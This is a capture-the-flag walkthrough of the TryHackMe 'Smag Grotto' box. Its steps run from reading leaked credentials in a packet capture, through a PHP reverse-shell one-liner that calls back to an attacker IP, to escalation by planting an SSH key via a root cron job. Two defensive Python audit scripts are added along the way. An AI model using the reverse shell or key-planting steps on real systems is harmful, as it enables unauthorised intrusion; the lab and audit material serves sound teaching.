THM - Smag Grotto
Introduction
Do you remember how to analyse packets?
This is an easy-rated box. Let's begin.
Ports
nmap shows only two open ports: 22 (SSH) and 80 (HTTP).
Webserver
There’s not much on the home page for the website, so we’ll run a quick gobuster:
root@kali:/opt/tryhackme/smag# gobuster dir -u http://10.10.184.160 -w /usr/share/dirb/wordlists/common.txt
This turns up one interesting directory, mail. Checking it, we get a message about a packet capture along with a download link. It says you have to download it with wget, although I'm sure that's not actually necessary. Let's do it anyway:
PCAP
We can open the packet capture in Wireshark, and it's very straightforward: we find a POST request with two important details. The first is a new subdomain:
http://development.smag.thm/login.php
The second is a set of credentials: helpdesk:REDACTED
We add development.smag.thm to our /etc/hosts and continue.
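The capture is small enough to read by hand in Wireshark, but the same question (does this pcap contain a form login sent over plain HTTP?) is worth automating when triaging captures. The following Python is an added example and not part of the original writeup: it builds a small constructed pcap in memory (one POST to development.smag.thm/login.php with a made-up password, plus a GET that should be ignored), walks the classic pcap container with struct, and reports every urlencoded POST whose field names look like credentials. The client address 192.0.2.10 and the password value are constructed; the server address is the box's IP from the writeup. The report deliberately lists field names, host and path rather than the secret values, so the output can go into a ticket without re-leaking the credential.

```python
import re
import struct
from urllib.parse import parse_qs

# --- constructed sample traffic (not from the original capture) ---
CLIENT_IP = bytes([192, 0, 2, 10])       # constructed client address
SERVER_IP = bytes([10, 10, 184, 160])    # the box's address from the writeup


def http_post(host, path, form_body):
    """Build a minimal urlencoded POST request as raw bytes."""
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(form_body)}\r\n"
        f"\r\n{form_body}"
    ).encode()


def build_pcap(payloads):
    """Wrap each payload in Ethernet/IPv4/TCP headers inside a classic pcap file.
    Checksums are left at zero; the parser below does not verify them."""
    # global header: magic, version 2.4, tz offset, sigfigs, snaplen, linktype 1 = Ethernet
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, payload in enumerate(payloads):
        eth = b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00"   # dst MAC, src MAC, EtherType IPv4
        # src port, dst port 80, seq, ack, data offset 5 words, flags PSH|ACK, window, csum, urg
        tcp = struct.pack("!HHIIBBHHH", 40000 + i, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                         0, 0, 64, 6, 0, CLIENT_IP, SERVER_IP)
        frame = eth + ip + tcp + payload
        out.append(struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


SAMPLE_PCAP = build_pcap([
    b"GET / HTTP/1.1\r\nHost: development.smag.thm\r\n\r\n",
    http_post("development.smag.thm", "/login.php",
              "username=helpdesk&password=example-pass"),  # constructed password
])

# --- parsing side ---
SENSITIVE_FIELD = re.compile(r"pass|pwd|secret|token", re.I)


def iter_pcap_frames(data):
    """Yield the link-layer bytes of each record in a classic (non-pcapng) pcap."""
    magic = struct.unpack("<I", data[:4])[0]
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != 1:
        raise ValueError("only Ethernet link type handled")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame):
    """Return (src_ip, dst_ip, dst_port, payload) for IPv4/TCP frames, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    if ip[9] != 6:                     # IP protocol 6 = TCP
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]
    data_off = (tcp[12] >> 4) * 4
    return src, dst, struct.unpack("!H", tcp[2:4])[0], tcp[data_off:]


def find_cleartext_credentials(pcap_bytes):
    """Report urlencoded POSTs over plain HTTP whose field names look like secrets."""
    findings = []
    for frame in iter_pcap_frames(pcap_bytes):
        parsed = tcp_payload(frame)
        if parsed is None or not parsed[3].startswith(b"POST "):
            continue
        src, dst, port, payload = parsed
        head, _, body = payload.partition(b"\r\n\r\n")
        request_line, *header_lines = head.decode("latin-1").split("\r\n")
        headers = {k.strip().lower(): v.strip()
                   for k, v in (h.split(":", 1) for h in header_lines if ":" in h)}
        if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
            continue
        fields = parse_qs(body.decode("latin-1"))
        secrets = sorted(k for k in fields if SENSITIVE_FIELD.search(k))
        if secrets:                     # names only, never the submitted values
            findings.append({"src": src, "dst": dst, "port": port,
                             "host": headers.get("host", dst),
                             "path": request_line.split(" ")[1],
                             "fields": sorted(fields), "secret_fields": secrets})
    return findings


if __name__ == "__main__":
    for f in find_cleartext_credentials(SAMPLE_PCAP):
        print(f"{f['src']} -> http://{f['host']}{f['path']} sent {f['fields']}; "
              f"in clear: {f['secret_fields']}")
```

The parser only understands the classic pcap container over Ethernet/IPv4/TCP and looks at one segment at a time, so a POST whose body is split across segments would be missed; for real captures, reassemble the stream first (Wireshark's Follow TCP Stream does this) and feed the reassembled request to the same header and body logic. The server-side fix is the usual one: serve login.php over TLS only, so the form never crosses the wire in clear.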
Admin.php
Once we go to development.smag.thm/login.php and authenticate, we get a page that says 'enter a command'. Any number of commands can be tried, but none of them appear to do anything... until you start a listener and try a reverse shell:
php -r '$sock=fsockopen("10.9.10.123",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Thanks, pentestmonkey.
On the box
As usual I run linpeas; this time we find a cron job:
root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
So the job is copying jake’s public key to the authorized keys file. Good to know.
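The job is dangerous for one reason only: root reads a file that a non-root user can write. The Python below is an added example and not from the original writeup. It parses /etc/crontab-style lines (schedule, user, command), pulls every absolute path out of each root job, and flags paths that a user other than root could modify (owner not root, world-writable, or group-writable by a non-root group). The crontab text and the file modes are constructed in a fake stat table so the example runs anywhere; leave stat_fn at its default of os.stat to audit a live host. It goes slightly beyond the page in also flagging the destination file, because a root job that writes into a path owned by a regular user can be redirected by that user.

```python
import os
import re
import stat
from types import SimpleNamespace

# schedule (5 fields or @keyword), then user, then command: the /etc/crontab layout
CRON_ENTRY = re.compile(
    r"^\s*(?P<schedule>@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<command>.+?)\s*$"
)
# absolute paths inside the command string (not preceded by a path character)
ABS_PATH = re.compile(r"(?<![\w.-])/[\w./-]+")

# constructed sample crontab; the second job mirrors the one found by linpeas
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root /bin/cat /opt/.backups/jake_id_rsa.pub.backup > /home/jake/.ssh/authorized_keys
"""


def fake_stat(path):
    """Constructed stand-in for os.stat: (mode, uid, gid) per path."""
    table = {
        "/bin/cat": (0o100755, 0, 0),
        "/etc/cron.hourly": (0o040755, 0, 0),
        "/opt/.backups/jake_id_rsa.pub.backup": (0o100666, 0, 0),   # world-writable
        "/home/jake/.ssh/authorized_keys": (0o100600, 1000, 1000),  # owned by a regular user
    }
    if path not in table:
        raise FileNotFoundError(path)
    mode, uid, gid = table[path]
    return SimpleNamespace(st_mode=mode, st_uid=uid, st_gid=gid)


def parse_system_crontab(text):
    """Yield (user, command) for each job line; skips comments, blanks and VAR=value lines."""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
            continue
        m = CRON_ENTRY.match(line)
        if m:
            yield m.group("user"), m.group("command")


def writable_by_untrusted(st, trusted_uids=(0,)):
    """True if someone outside trusted_uids could change the file's contents."""
    if st.st_uid not in trusted_uids:
        return True
    if st.st_mode & stat.S_IWOTH:
        return True
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return True
    return False


def audit_cron(text, stat_fn=os.stat, trusted_uids=(0,)):
    """Flag every path a root cron job touches that an untrusted user could modify."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in ABS_PATH.findall(command):
            try:
                st = stat_fn(path)
            except FileNotFoundError:
                continue
            if writable_by_untrusted(st, trusted_uids):
                findings.append({"command": command, "path": path,
                                 "mode": oct(st.st_mode & 0o777), "owner": st.st_uid})
    return findings


if __name__ == "__main__":
    for f in audit_cron(SAMPLE_CRONTAB, stat_fn=fake_stat):
        print(f"root job touches {f['path']} (mode {f['mode']}, uid {f['owner']}): {f['command']}")
```

On a real host, feed it /etc/crontab and each file under /etc/cron.d; per-user crontabs have no user column and need the schedule-only form. The fix for the job on this box is equally plain: make the backup readable and writable by root only, or drop the job and manage authorized_keys directly.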
SSH-keygen
Let’s generate a new SSH key with ssh-keygen:
Once that's done (with the passphrase 'yolo'), we can get the public key onto the box, append it to the jake_id_rsa.pub.backup file and wait for the cron job to run.
Jake
Now we can log in as jake with our key and passphrase:
root@kali:/opt/tryhackme/smag# ssh -i id_rsa jake@smag.thm
Running sudo -l gives us this:
And GTFOBins does the rest: